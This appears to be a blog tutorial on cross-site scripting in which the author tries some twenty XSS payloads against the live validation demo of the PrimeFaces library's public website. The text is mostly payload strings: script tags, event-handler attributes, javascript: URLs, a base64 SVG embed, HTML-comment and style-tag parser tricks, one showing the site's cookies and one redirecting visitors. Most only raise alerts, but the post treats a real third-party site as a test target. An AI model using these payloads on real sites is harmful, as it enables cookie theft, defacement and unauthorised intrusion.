Print Friendly, PDF & Email

Hello everyone! Sometimes even professionals forget how to do a simple configuration, and we will take advantage od that to learn some Java Hacking with a technique named XSS over a real JSF enviroment.

java hacking

Hacking primefaces

Primefaces.org is the site for the JSF library primefaces that is not only very popular but very attractive visually. I was navigating the site in my quest for validation hints and realized the validation demo was vulnerable, and decided to use it to learn on a real enviroment the hacking technique called cross site scripting or XSS.

The power of this type of attack technique resides on that when the data get’s saved, everytime it get’s consulted will always run the code we introduced. Let’s go to the examples.

"><script>alert("javapro.org")</script>

xss primefaces simple alert

With this vector we can in example obtain the cookies that the site handles

"><script>alert (document.cookie)</script>

xss primefaces cookies

We can also execute JavaScript from within an iframe

"><IFRAME SRC="javascript:alert('javapro.org');"></IFRAME>

Or simply show an iframe

"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://javapro.org/"></iframe>

xss primefaces iframe

we can also execute some code from an HTML5 video object

"><video><source onerror="alert('javapro.org')">

We can also generate a button an make the code we wish to be executed when clicked by

"><form><button style="height:200px;width:800px;" formaction="javascript:alert('javapro.org')">Click!</button>

In the same way we can also use a math object

"><math href="javascript:alert('javapro.org')">CLICKME</math>

Math objects can also have some other executable objects inside

"><math><maction actiontype="statusline" xlink:href="javascript:alert('javapro.org')">CLICKME<mtext>HCKD</mtext></maction> </math>

Links are also useful, we can in example use javascript as part of the URL

"><a href="javascript:alert('javascriptpro.org')">click me!</a>

xss primefaces anchor edge

From an embedded and executing a svg image

"><EMBED SRC="data:image/svg xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI YWxlcnQoImphdmFwcm8ub3JnIik7PC9zY3JpcHQ PC9zdmc " type="image/svg xml" AllowScriptAccess="always"></EMBED>

the last script produces exactlythe same results as the preceding one

 

Using AJAX validation we can achieve the code to be executed as you write by using event attribute from script tag

"><SCRIPT FOR=document EVENT=onreadystatechange>alert('javapro.org')</SCRIPT>

in a similar way we can even modify the current label an achieve that when we pass the mouse over the label our code will be executed

" onmouseover="alert('javapro.org')" >

Moreover we don’t even need angular brackets

" onmouseover="alert;throw 1;"

We can also show a new page

" onmouseenter="document.open();document.write('<html><body><p>JavaPro.org</p></body></html>');document.close();" >

We can produce a message followed by an error

" onmouseenter="document.location=alert('javapro.org')//" >

Or a redirect call, in example

" onmouseenter="document.location='http://www.javapro.org'"

HTML comments are harmless doesn’t them? NO!

<!--<img src="--><img src=x onerror=alert('javapro.org')//"-->

Taking advantage of a parsing bug.

<![><img src="]><img src=x onerror=alert('javapro.org')//">

 

xss primefaces edge script event

We can also ofuscate a bit and take advantage of parsers errors

"><style><img src="</style><img src=x onerror=alert('javapro.org')//">

 

 

Radio

Do NOT follow this link or you will be banned from the site!